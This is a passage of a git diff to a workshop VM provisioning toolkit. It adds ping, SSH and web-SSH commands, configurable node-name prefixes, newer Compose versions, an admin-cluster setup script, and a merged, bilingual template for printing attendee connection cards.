+_cmd ping "Ping VMs in a given tag, to check that they have network access"
+_cmd_ping() {
+    TAG=$1
+    need_tag
+
+    fping < tags/$TAG/ips.txt
+}
+
 _cmd netfix "Disable GRO and run a pinger job on the VMs"
 _cmd_netfix () {
    TAG=$1
@@ -356,6 +399,15 @@ _cmd_retag() {
    aws_tag_instances $OLDTAG $NEWTAG
 }

+_cmd ssh "Open an SSH session to the first node of a tag"
+_cmd_ssh() {
+    TAG=$1
+    need_tag
+    IP=$(head -1 tags/$TAG/ips.txt)
+    info "Logging into $IP"
+    ssh docker@$IP
+}
+
 _cmd start "Start a group of VMs"
 _cmd_start() {
    while [ ! -z "$*" ]; do
@@ -367,7 +419,7 @@ _cmd_start() {
        *) die "Unrecognized parameter: $1."
        esac
    done
-    
+
    if [ -z "$INFRA" ]; then
        die "Please add --infra flag to specify which infrastructure file to use."
    fi
@@ -378,8 +430,8 @@ _cmd_start() {
        COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
        warning "No --count option was specified. Using value from settings file ($COUNT)."
    fi
-    
-    # Check that the specified settings and infrastructure are valid.        
+
+    # Check that the specified settings and infrastructure are valid.
    need_settings $SETTINGS
    need_infra $INFRA

@@ -451,15 +503,15 @@ _cmd_helmprom() {
    TAG=$1
    need_tag
    pssh "
-    if grep -q node1 /tmp/node; then
+    if i_am_first_node; then
        kubectl -n kube-system get serviceaccount helm ||
            kubectl -n kube-system create serviceaccount helm
-        helm init --service-account helm
+        sudo -u docker -H helm init --service-account helm
        kubectl get clusterrolebinding helm-can-do-everything ||
            kubectl create clusterrolebinding helm-can-do-everything \
                --clusterrole=cluster-admin \
                --serviceaccount=kube-system:helm
-        helm upgrade --install prometheus stable/prometheus \
+        sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
            --namespace kube-system \
            --set server.service.type=NodePort \
            --set server.service.nodePort=30090 \
@@ -484,6 +536,38 @@ _cmd_weavetest() {
    sh -c \"./weave --local status | grep Connections | grep -q ' 1 failed' || ! echo POD \""
 }

+_cmd webssh "Install a WEB SSH server on the machines (port 1080)"
+_cmd_webssh() {
+    TAG=$1
+    need_tag
+    pssh "
+    sudo apt-get update &&
+    sudo apt-get install python-tornado python-paramiko -y"
+    pssh "
+    [ -d webssh ] || git clone https://github.com/jpetazzo/webssh"
+    pssh "
+    for KEYFILE in /etc/ssh/*.pub; do
+      read a b c < \$KEYFILE; echo localhost \$a \$b
+    done > webssh/known_hosts"
+    pssh "cat >webssh.service <<EOF
+[Unit]
+Description=webssh
+
+[Install]
+WantedBy=multi-user.target
+
+[Service]
+WorkingDirectory=/home/ubuntu/webssh
+ExecStart=/usr/bin/env python run.py --fbidhttp=false --port=1080 --policy=reject
+User=nobody
+Group=nogroup
+Restart=always
+EOF"
+    pssh "
+    sudo systemctl enable \$PWD/webssh.service &&
+    sudo systemctl start webssh.service"
+}
+
 greet() {
    IAMUSER=$(aws iam get-user --query 'User.UserName')
    info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
@@ -541,8 +625,8 @@ test_vm() {
    for cmd in "hostname" \
        "whoami" \
        "hostname -i" \
-        "cat /tmp/node" \
-        "cat /tmp/ipv4" \
+        "ls -l /usr/local/bin/i_am_first_node" \
+        "grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
        "cat /etc/hosts" \
        "hostnamectl status" \
        "docker version | grep Version -B1" \
--- a/prepare-vms/lib/infra/aws.sh
+++ b/prepare-vms/lib/infra/aws.sh
@@ -31,6 +31,7 @@ infra_start() {
        die "I could not find which AMI to use in this region. Try another region?"
    fi
    AWS_KEY_NAME=$(make_key_name)
+    AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}

    sep "Starting instances"
    info "         Count: $COUNT"
@@ -38,10 +39,11 @@ infra_start() {
    info "     Token/tag: $TAG"
    info "           AMI: $AMI"
    info "      Key name: $AWS_KEY_NAME"
+    info " Instance type: $AWS_INSTANCE_TYPE"
    result=$(aws ec2 run-instances \
        --key-name $AWS_KEY_NAME \
        --count $COUNT \
-        --instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
+        --instance-type $AWS_INSTANCE_TYPE \
        --client-token $TAG \
        --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
        --image-id $AMI)
@@ -97,7 +99,7 @@ infra_disableaddrchecks() {
 }

 wait_until_tag_is_running() {
-    max_retry=50
+    max_retry=100
    i=0
    done_count=0
    while [[ $done_count -lt $COUNT ]]; do
--- a/prepare-vms/lib/ips-txt-to-html.py
+++ b/prepare-vms/lib/ips-txt-to-html.py
@@ -1,4 +1,4 @@
-#!/usr/bin/env python
+#!/usr/bin/env python3
 import os
 import sys
 import yaml
--- a/prepare-vms/lib/postprep.py
+++ b/prepare-vms/lib/postprep.py
@@ -12,6 +12,7 @@ config = yaml.load(open("/tmp/settings.yaml"))
 COMPOSE_VERSION = config["compose_version"]
 MACHINE_VERSION = config["machine_version"]
 CLUSTER_SIZE = config["clustersize"]
+CLUSTER_PREFIX = config["clusterprefix"]
 ENGINE_VERSION = config["engine_version"]
 DOCKER_USER_PASSWORD = config["docker_user_password"]

@@ -121,7 +122,7 @@ addresses = list(l.strip() for l in sys.stdin)
 assert ipv4 in addresses

 def makenames(addrs):
-    return [ "node%s"%(i+1) for i in range(len(addrs)) ]
+    return [ "%s%s"%(CLUSTER_PREFIX, i+1) for i in range(len(addrs)) ]

 while addresses:
    cluster = addresses[:CLUSTER_SIZE]
@@ -135,15 +136,21 @@ while addresses:
    print(cluster)

    mynode = cluster.index(ipv4) + 1
-    system("echo node{} | sudo -u docker tee /tmp/node".format(mynode))
-    system("echo node{} | sudo tee /etc/hostname".format(mynode))
-    system("sudo hostname node{}".format(mynode))
+    system("echo {}{} | sudo tee /etc/hostname".format(CLUSTER_PREFIX, mynode))
+    system("sudo hostname {}{}".format(CLUSTER_PREFIX, mynode))
    system("sudo -u docker mkdir -p /home/docker/.ssh")
    system("sudo -u docker touch /home/docker/.ssh/authorized_keys")

+    # Create a convenience file to easily check if we're the first node
    if ipv4 == cluster[0]:
-        # If I'm node1 and don't have a private key, generate one (with empty passphrase)
+        system("sudo ln -sf /bin/true /usr/local/bin/i_am_first_node")
+        # On the first node, if we don't have a private key, generate one (with empty passphrase)
        system("sudo -u docker [ -f /home/docker/.ssh/id_rsa ] || sudo -u docker ssh-keygen -t rsa -f /home/docker/.ssh/id_rsa -P ''")
+    else:
+        system("sudo ln -sf /bin/false /usr/local/bin/i_am_first_node")
+    # Record the IPV4 and name of the first node
+    system("echo {} | sudo tee /etc/ipv4_of_first_node".format(cluster[0]))
+    system("echo {} | sudo tee /etc/name_of_first_node".format(names[0]))

 FINISH = time.time()
 duration = "Initial deployment took {}s".format(str(FINISH - START)[:5])
--- a/prepare-vms/settings/admin-dmuc.yaml
+++ b/prepare-vms/settings/admin-dmuc.yaml
@@ -1,8 +1,11 @@
 # Number of VMs per cluster
 clustersize: 1

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: dmuc
+
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: enix.html
+cards_template: cards.html

 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: A4
@@ -18,9 +21,8 @@ paper_margin: 0.2in
 engine_version: stable

 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.21.1
+compose_version: 1.24.1
 machine_version: 0.14.0

 # Password used to connect with the "docker user"
 docker_user_password: training
-
--- a/prepare-vms/settings/admin-kubenet.yaml
+++ b/prepare-vms/settings/admin-kubenet.yaml
@@ -0,0 +1,28 @@
+# Number of VMs per cluster
+clustersize: 3
+
+# The hostname of each node will be clusterprefix + a number
+clusterprefix: kubenet
+
+# Jinja2 template to use to generate ready-to-cut cards
+cards_template: cards.html
+
+# Use "Letter" in the US, and "A4" everywhere else
+paper_size: A4
+
+# Feel free to reduce this if your printer can handle it
+paper_margin: 0.2in
+
+# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
+# If you print (or generate a PDF) using ips.html, they will be ignored.
+# (The equivalent parameters must be set from the browser's print dialog.)
+
+# This can be "test" or "stable"
+engine_version: stable
+
+# These correspond to the version numbers visible on their respective GitHub release pages
+compose_version: 1.24.1
+machine_version: 0.14.0
+
+# Password used to connect with the "docker user"
+docker_user_password: training
--- a/prepare-vms/settings/admin-kuberouter.yaml
+++ b/prepare-vms/settings/admin-kuberouter.yaml
@@ -0,0 +1,28 @@
+# Number of VMs per cluster
+clustersize: 3
+
+# The hostname of each node will be clusterprefix + a number
+clusterprefix: kuberouter
+
+# Jinja2 template to use to generate ready-to-cut cards
+cards_template: cards.html
+
+# Use "Letter" in the US, and "A4" everywhere else
+paper_size: A4
+
+# Feel free to reduce this if your printer can handle it
+paper_margin: 0.2in
+
+# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
+# If you print (or generate a PDF) using ips.html, they will be ignored.
+# (The equivalent parameters must be set from the browser's print dialog.)
+
+# This can be "test" or "stable"
+engine_version: stable
+
+# These correspond to the version numbers visible on their respective GitHub release pages
+compose_version: 1.24.1
+machine_version: 0.14.0
+
+# Password used to connect with the "docker user"
+docker_user_password: training
--- a/prepare-vms/settings/admin-test.yaml
+++ b/prepare-vms/settings/admin-test.yaml
@@ -0,0 +1,28 @@
+# Number of VMs per cluster
+clustersize: 3
+
+# The hostname of each node will be clusterprefix + a number
+clusterprefix: test
+
+# Jinja2 template to use to generate ready-to-cut cards
+cards_template: cards.html
+
+# Use "Letter" in the US, and "A4" everywhere else
+paper_size: A4
+
+# Feel free to reduce this if your printer can handle it
+paper_margin: 0.2in
+
+# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
+# If you print (or generate a PDF) using ips.html, they will be ignored.
+# (The equivalent parameters must be set from the browser's print dialog.)
+
+# This can be "test" or "stable"
+engine_version: stable
+
+# These correspond to the version numbers visible on their respective GitHub release pages
+compose_version: 1.24.1
+machine_version: 0.14.0
+
+# Password used to connect with the "docker user"
+docker_user_password: training
--- a/prepare-vms/settings/csv.yaml
+++ b/prepare-vms/settings/csv.yaml
@@ -1,5 +1,8 @@
 # Number of VMs per cluster
 clustersize: 5

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node
+
 # Jinja2 template to use to generate ready-to-cut cards
 cards_template: clusters.csv
--- a/prepare-vms/settings/example.yaml
+++ b/prepare-vms/settings/example.yaml
@@ -3,6 +3,9 @@
 # Number of VMs per cluster
 clustersize: 5

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node
+
 # Jinja2 template to use to generate ready-to-cut cards
 cards_template: cards.html

@@ -20,7 +23,7 @@ paper_margin: 0.2in
 engine_version: test

 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.18.0
+compose_version: 1.24.1
 machine_version: 0.13.0

 # Password used to connect with the "docker user"
--- a/prepare-vms/settings/fundamentals.yaml
+++ b/prepare-vms/settings/fundamentals.yaml
@@ -3,6 +3,9 @@
 # Number of VMs per cluster
 clustersize: 1

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node
+
 # Jinja2 template to use to generate ready-to-cut cards
 cards_template: cards.html

@@ -20,7 +23,7 @@ paper_margin: 0.2in
 engine_version: stable

 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.22.0
+compose_version: 1.24.1
 machine_version: 0.15.0

 # Password used to connect with the "docker user"
--- a/prepare-vms/settings/jerome.yaml
+++ b/prepare-vms/settings/jerome.yaml
@@ -1,11 +1,14 @@
 # Number of VMs per cluster
 clustersize: 4

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node
+
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: jerome.html
+cards_template: cards.html

 # Use "Letter" in the US, and "A4" everywhere else
-paper_size: A4
+paper_size: Letter

 # Feel free to reduce this if your printer can handle it
 paper_margin: 0.2in
@@ -18,7 +21,7 @@ paper_margin: 0.2in
 engine_version: stable

 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.21.1
+compose_version: 1.24.1
 machine_version: 0.14.0

 # Password used to connect with the "docker user"
--- a/prepare-vms/settings/kube101.yaml
+++ b/prepare-vms/settings/kube101.yaml
@@ -3,8 +3,11 @@
 # Number of VMs per cluster
 clustersize: 3

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node
+
 # Jinja2 template to use to generate ready-to-cut cards
-cards_template: kube101.html
+cards_template: cards.html

 # Use "Letter" in the US, and "A4" everywhere else
 paper_size: Letter
@@ -20,7 +23,7 @@ paper_margin: 0.2in
 engine_version: stable

 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.21.1
+compose_version: 1.24.1
 machine_version: 0.14.0

 # Password used to connect with the "docker user"
--- a/prepare-vms/settings/swarm.yaml
+++ b/prepare-vms/settings/swarm.yaml
@@ -3,6 +3,9 @@
 # Number of VMs per cluster
 clustersize: 3

+# The hostname of each node will be clusterprefix + a number
+clusterprefix: node
+
 # Jinja2 template to use to generate ready-to-cut cards
 cards_template: cards.html

@@ -20,7 +23,7 @@ paper_margin: 0.2in
 engine_version: stable

 # These correspond to the version numbers visible on their respective GitHub release pages
-compose_version: 1.22.0
+compose_version: 1.24.1
 machine_version: 0.15.0

 # Password used to connect with the "docker user"
--- a/prepare-vms/setup-admin-clusters.sh
+++ b/prepare-vms/setup-admin-clusters.sh
@@ -0,0 +1,66 @@
+#!/bin/sh
+set -e
+
+export AWS_INSTANCE_TYPE=t3a.small
+
+INFRA=infra/aws-us-west-2
+
+STUDENTS=2
+
+PREFIX=$(date +%Y-%m-%d-%H-%M)
+
+SETTINGS=admin-dmuc
+TAG=$PREFIX-$SETTINGS
+./workshopctl start \
+	--tag $TAG \
+	--infra $INFRA \
+	--settings settings/$SETTINGS.yaml \
+	--count $STUDENTS
+
+./workshopctl deploy $TAG
+./workshopctl disabledocker $TAG
+./workshopctl kubebins $TAG
+./workshopctl cards $TAG
+
+SETTINGS=admin-kubenet
+TAG=$PREFIX-$SETTINGS
+./workshopctl start \
+	--tag $TAG \
+	--infra $INFRA \
+	--settings settings/$SETTINGS.yaml \
+	--count $((3*$STUDENTS))
+
+./workshopctl disableaddrchecks $TAG
+./workshopctl deploy $TAG
+./workshopctl kubebins $TAG
+./workshopctl cards $TAG
+
+SETTINGS=admin-kuberouter
+TAG=$PREFIX-$SETTINGS
+./workshopctl start \
+	--tag $TAG \
+	--infra $INFRA \
+	--settings settings/$SETTINGS.yaml \
+	--count $((3*$STUDENTS))
+
+./workshopctl disableaddrchecks $TAG
+./workshopctl deploy $TAG
+./workshopctl kubebins $TAG
+./workshopctl cards $TAG
+
+#INFRA=infra/aws-us-west-1
+
+export AWS_INSTANCE_TYPE=t3a.medium
+
+SETTINGS=admin-test
+TAG=$PREFIX-$SETTINGS
+./workshopctl start \
+	--tag $TAG \
+	--infra $INFRA \
+	--settings settings/$SETTINGS.yaml \
+	--count $((3*$STUDENTS))
+
+./workshopctl deploy $TAG
+./workshopctl kube $TAG 1.13.5
+./workshopctl cards $TAG
+
--- a/prepare-vms/templates/cards.html
+++ b/prepare-vms/templates/cards.html
@@ -1,29 +1,88 @@
 {# Feel free to customize or override anything in there! #}
-{%- set url = "http://container.training/" -%}
-{%- set pagesize = 12 -%}
-{%- if clustersize == 1 -%}
-    {%- set workshop_name = "Docker workshop" -%}
-    {%- set cluster_or_machine = "machine" -%}
-    {%- set this_or_each = "this" -%}
-    {%- set machine_is_or_machines_are = "machine is" -%}
-    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
-{%- else -%}
-    {%- set workshop_name = "orchestration workshop" -%}
-    {%- set cluster_or_machine = "cluster" -%}
-    {%- set this_or_each = "each" -%}
-    {%- set machine_is_or_machines_are = "machines are" -%}
-    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
-    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
-    {%- set image_src = image_src_swarm -%}
+
+{%- set url = "http://FIXME.container.training/" -%}
+{%- set pagesize = 9 -%}
+{%- set lang = "en" -%}
+{%- set event = "training session" -%}
+{%- set backside = False -%}
+{%- set image = "kube" -%}
+{%- set clusternumber = 100 -%}
+
+{%- set image_src = {
+	"docker": "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png",
+	"swarm": "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png",
+	"kube": "https://avatars1.githubusercontent.com/u/13629408",
+	"enix": "https://enix.io/static/img/logos/logo-domain-cropped.png",
+    }[image] -%}
+{%- if lang == "en" and clustersize == 1 -%}
+	{%- set intro -%}
+	Here is the connection information to your very own
+	machine for this {{ event }}.
+	You can connect to this VM with any SSH client.
+	{%- endset -%}
+    {%- set listhead -%}
+    Your machine is:
+	{%- endset -%}
+{%- endif -%}
+{%- if lang == "en" and clustersize != 1 -%}
+	{%- set intro -%}
+	Here is the connection information to your very own
+	cluster for this {{ event }}.
+	You can connect to each VM with any SSH client.
+	{%- endset -%}
+    {%- set listhead -%}
+    Your machines are:
+	{%- endset -%}
+{%- endif -%}
+{%- if lang == "fr" and clustersize == 1 -%}
+	{%- set intro -%}
+	Voici les informations permettant de se connecter à votre
+	machine pour cette formation.
+	Vous pouvez vous connecter à cette machine virtuelle
+	avec n'importe quel client SSH.
+	{%- endset -%}
+    {%- set listhead -%}
+    Adresse IP:
+	{%- endset -%}
+{%- endif -%}
+{%- if lang == "en" and clusterprefix != "node" -%}
+	{%- set intro -%}
+    Here is the connection information for the
+    <strong>{{ clusterprefix }}</strong> environment.
+	{%- endset -%}
+{%- endif -%}
+{%- if lang == "fr" and clustersize != 1 -%}
+	{%- set intro -%}
+	Voici les informations permettant de se connecter à votre
+	cluster pour cette formation.
+	Vous pouvez vous connecter à chaque machine virtuelle
+	avec n'importe quel client SSH.
+	{%- endset -%}
+    {%- set listhead -%}
+	Adresses IP:
+	{%- endset -%}
+{%- endif -%}
+{%- if lang == "en"  -%}
+	{%- set slides_are_at -%}
+	You can find the slides at:
+	{%- endset -%}
+{%- endif -%}
+{%- if lang == "fr" -%}
+	{%- set slides_are_at -%}
+  	Le support de formation est à l'adresse suivante :
+	{%- endset -%}
 {%- endif -%}
 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
 <html>
 <head><style>
+@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
+
 body, table {
    margin: 0;
    padding: 0;
    line-height: 1em;
-    font-size: 14px;
+    font-size: 15px;
+    font-family: 'Slabo 27px';
 }

 table {
@@ -37,24 +96,54 @@ table {
 div {
    float: left;
    border: 1px dotted black;
+    {% if backside %}
+    height: 31%;
+    {% endif %}
    padding-top: 1%;
    padding-bottom: 1%;
    /* columns * (width+left+right) < 100% */
+    /*
    width: 21.5%;
    padding-left: 1.5%;
    padding-right: 1.5%;
+    */
+    /**/
+    width: 30%;
+    padding-left: 1.5%;
+    padding-right: 1.5%;
+    /**/    
 }

 p {
    margin: 0.4em 0 0.4em 0;
 }

+div.back {
+	border: 1px dotted white;
+}
+
+div.back p {
+    margin: 0.5em 1em 0 1em;
+}
+
 img {
    height: 4em;
    float: right;
-    margin-right: -0.4em;
+    margin-right: -0.2em;
 }

+/*
+img.enix {
+    height: 4.0em;
+    margin-top: 0.4em;
+}
+
+img.kube {
+    height: 4.2em;
+    margin-top: 1.7em;
+}
+*/
+
 .logpass {
    font-family: monospace;
    font-weight: bold;
@@ -69,19 +158,15 @@ img {
 </style></head>
 <body>
 {% for cluster in clusters %}
-    {% if loop.index0>0 and loop.index0%pagesize==0 %}
-        <span class="pagebreak"></span>
-    {% endif %}
    <div>
-
-        <p>
-            Here is the connection information to your very own
-            {{ cluster_or_machine }} for this {{ workshop_name }}.
-            You can connect to {{ this_or_each }} VM with any SSH client.
-        </p>
+        <p>{{ intro }}</p>
        <p>
            <img src="{{ image_src }}" />
            <table>
+            	{% if clusternumber != None %}
+	            <tr><td>cluster:</td></tr>
+	            <tr><td class="logpass">{{ clusternumber + loop.index }}</td></tr>
+            	{% endif %}
                <tr><td>login:</td></tr>
                <tr><td class="logpass">docker</td></tr>
                <tr><td>password:</td></tr>
@@ -90,17 +175,44 @@ img {

        </p>
        <p>
-            Your {{ machine_is_or_machines_are }}:
+            {{ listhead }}
            <table>
                {% for node in cluster %}
-                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
+                <tr>
+                	<td>{{ clusterprefix }}{{ loop.index }}:</td>
+                	<td>{{ node }}</td>
+                </tr>
                {% endfor %}
            </table>
        </p>
-        <p>You can find the slides at:
+
+        <p>
+        	{{ slides_are_at }}
            <center>{{ url }}</center>
        </p>
    </div>
+    {% if loop.index%pagesize==0 or loop.last %}
+        <span class="pagebreak"></span>
+        {% if backside %}
+			{% for x in range(pagesize) %}
+		        <div class="back">
+		        <br/>
+				<p>You got this at the workshop
+				"Getting Started With Kubernetes and Container Orchestration"
+				during QCON London (March 2019).</p>
+				<p>If you liked that workshop,
+				I can train your team or organization
+				on Docker, container, and Kubernetes,
+				with curriculums of 1 to 5 days.
+				</p>
+				<p>Interested? Contact me at:</p>
+				<p>jerome.petazzoni@gmail.com</p>
+				<p>Thank you!</p>
+		        </div>
+			{% endfor %}
+		<span class="pagebreak"></span>
+		{% endif %}
+    {% endif %}
 {% endfor %}
 </body>
 </html>
--- a/prepare-vms/templates/enix.html
+++ b/prepare-vms/templates/enix.html
@@ -1,121 +0,0 @@
-{# Feel free to customize or override anything in there! #}
-{%- set url = "http://FIXME.container.training" -%}
-{%- set pagesize = 9 -%}
-{%- if clustersize == 1 -%}
-    {%- set workshop_name = "Docker workshop" -%}
-    {%- set cluster_or_machine = "machine virtuelle" -%}
-    {%- set this_or_each = "cette" -%}
-    {%- set plural = "" -%}
-    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
-{%- else -%}
-    {%- set workshop_name = "Kubernetes workshop" -%}
-    {%- set cluster_or_machine = "cluster" -%}
-    {%- set this_or_each = "chaque" -%}
-    {%- set plural = "s" -%}
-    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
-    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
-    {%- set image_src = image_src_kube -%}
-{%- endif -%}
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
-<html>
-<head><style>
-@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
-
-body, table {
-    margin: 0;
-    padding: 0;
-    line-height: 1em;
-    font-size: 15px;
-    font-family: 'Slabo 27px';
-}
-
-table {
-    border-spacing: 0;
-    margin-top: 0.4em;
-    margin-bottom: 0.4em;
-    border-left: 0.8em double grey;
-    padding-left: 0.4em;
-}
-
-div {
-    float: left;
-    border: 1px dotted black;
-    padding-top: 1%;
-    padding-bottom: 1%;
-    /* columns * (width+left+right) < 100% */
-    width: 30%;
-    padding-left: 1.5%;
-    padding-right: 1.5%;
-}
-
-p {
-    margin: 0.4em 0 0.4em 0;
-}
-
-img {
-    height: 4em;
-    float: right;
-    margin-right: -0.3em;
-}
-
-img.enix {
-    height: 4.0em;
-    margin-top: 0.4em;
-}
-
-img.kube {
-    height: 4.2em;
-    margin-top: 1.7em;
-}
-
-.logpass {
-    font-family: monospace;
-    font-weight: bold;
-}
-
-.pagebreak {
-    page-break-after: always;
-    clear: both;
-    display: block;
-    height: 8px;
-}
-</style></head>
-<body>
-{% for cluster in clusters %}
-    {% if loop.index0>0 and loop.index0%pagesize==0 %}
-        <span class="pagebreak"></span>
-    {% endif %}
-    <div>
-
-        <p>
-            Voici les informations permettant de se connecter à votre
-	    {{ cluster_or_machine }} pour cette formation.
-	    Vous pouvez vous connecter à {{ this_or_each }} machine virtuelle
-	    avec n'importe quel client SSH.
-        </p>
-        <p>
-	    <img class="enix" src="https://enix.io/static/img/logos/logo-domain-cropped.png" />
-            <table>
-                <tr><td>identifiant:</td></tr>
-                <tr><td class="logpass">docker</td></tr>
-                <tr><td>mot de passe:</td></tr>
-                <tr><td class="logpass">{{ docker_user_password }}</td></tr>
-            </table>
-
-        </p>
-        <p>
-	Adresse{{ plural }} IP :
-	<!--<img class="kube" src="{{ image_src }}" />-->
-            <table>
-                {% for node in cluster %}
-                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
-                {% endfor %}
-            </table>
-        </p>
-        <p>Le support de formation est à l'adresse suivante :
-            <center>{{ url }}</center>
-        </p>
-    </div>
-{% endfor %}
-</body>
-</html>
--- a/prepare-vms/templates/jerome.html
+++ b/prepare-vms/templates/jerome.html
@@ -1,134 +0,0 @@
-{# Feel free to customize or override anything in there! #}
-{%- set url = "http://qconuk2019.container.training/" -%}
-{%- set pagesize = 9 -%}
-{%- if clustersize == 1 -%}
-    {%- set workshop_name = "Docker workshop" -%}
-    {%- set cluster_or_machine = "machine" -%}
-    {%- set this_or_each = "this" -%}
-    {%- set machine_is_or_machines_are = "machine is" -%}
-    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
-{%- else -%}
-    {%- set workshop_name = "Kubernetes workshop" -%}
-    {%- set cluster_or_machine = "cluster" -%}
-    {%- set this_or_each = "each" -%}
-    {%- set machine_is_or_machines_are = "machines are" -%}
-    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
-    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
-    {%- set image_src = image_src_kube -%}
-{%- endif -%}
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
-<html>
-<head><style>
-@import url('https://fonts.googleapis.com/css?family=Slabo+27px');
-body, table {
-    margin: 0;
-    padding: 0;
-    line-height: 1.0em;
-    font-size: 15px;
-    font-family: 'Slabo 27px';
-}
-
-table {
-    border-spacing: 0;
-    margin-top: 0.4em;
-    margin-bottom: 0.4em;
-    border-left: 0.8em double grey;
-    padding-left: 0.4em;
-}
-
-div {
-    float: left;
-    border: 1px dotted black;
-    height: 31%;
-    padding-top: 1%;
-    padding-bottom: 1%;
-    /* columns * (width+left+right) < 100% */
-    width: 30%;
-    padding-left: 1.5%;
-    padding-right: 1.5%;
-}
-
-div.back {
-	border: 1px dotted white;
-}
-
-div.back p {
-    margin: 0.5em 1em 0 1em;
-}
-
-p {
-    margin: 0.4em 0 0.8em 0;
-}
-
-img {
-    height: 5em;
-    float: right;
-    margin-right: 1em;
-}
-
-.logpass {
-    font-family: monospace;
-    font-weight: bold;
-}
-
-.pagebreak {
-    page-break-after: always;
-    clear: both;
-    display: block;
-    height: 8px;
-}
-</style></head>
-<body>
-{% for cluster in clusters %}
-    <div>
-
-        <p>
-            Here is the connection information to your very own
-            {{ cluster_or_machine }} for this {{ workshop_name }}.
-            You can connect to {{ this_or_each }} VM with any SSH client.
-        </p>
-        <p>
-            <img src="{{ image_src }}" />
-            <table>
-                <tr><td>login:</td></tr>
-                <tr><td class="logpass">docker</td></tr>
-                <tr><td>password:</td></tr>
-                <tr><td class="logpass">{{ docker_user_password }}</td></tr>
-            </table>
-
-        </p>
-        <p>
-            Your {{ machine_is_or_machines_are }}:
-            <table>
-                {% for node in cluster %}
-                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
-                {% endfor %}
-            </table>
-        </p>
-        <p>You can find the slides at:
-            <center>{{ url }}</center>
-        </p>
-    </div>
-    {% if loop.index%pagesize==0 or loop.last %}
-        <span class="pagebreak"></span>
-	{% for x in range(pagesize) %}
-        <div class="back">
-        <br/>
-		<p>You got this at the workshop
-		"Getting Started With Kubernetes and Container Orchestration"
-		during QCON London (March 2019).</p>
-		<p>If you liked that workshop,
-		I can train your team or organization
-		on Docker, container, and Kubernetes,
-		with curriculums of 1 to 5 days.
-		</p>
-		<p>Interested? Contact me at:</p>
-		<p>jerome.petazzoni@gmail.com</p>
-		<p>Thank you!</p>
-        </div>
-	{% endfor %}
-	<span class="pagebreak"></span>
-    {% endif %}
-{% endfor %}
-</body>
-</html>
--- a/prepare-vms/templates/kube101.html
+++ b/prepare-vms/templates/kube101.html
@@ -1,106 +0,0 @@
-{# Feel free to customize or override anything in there! #}
-{%- set url = "http://container.training/" -%}
-{%- set pagesize = 12 -%}
-{%- if clustersize == 1 -%}
-    {%- set workshop_name = "Docker workshop" -%}
-    {%- set cluster_or_machine = "machine" -%}
-    {%- set this_or_each = "this" -%}
-    {%- set machine_is_or_machines_are = "machine is" -%}
-    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
-{%- else -%}
-    {%- set workshop_name = "Kubernetes workshop" -%}
-    {%- set cluster_or_machine = "cluster" -%}
-    {%- set this_or_each = "each" -%}
-    {%- set machine_is_or_machines_are = "machines are" -%}
-    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
-    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
-    {%- set image_src = image_src_kube -%}
-{%- endif -%}
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
-<html>
-<head><style>
-body, table {
-    margin: 0;
-    padding: 0;
-    line-height: 1em;
-    font-size: 14px;
-}
-
-table {
-    border-spacing: 0;
-    margin-top: 0.4em;
-    margin-bottom: 0.4em;
-    border-left: 0.8em double grey;
-    padding-left: 0.4em;
-}
-
-div {
-    float: left;
-    border: 1px dotted black;
-    padding-top: 1%;
-    padding-bottom: 1%;
-    /* columns * (width+left+right) < 100% */
-    width: 21.5%;
-    padding-left: 1.5%;
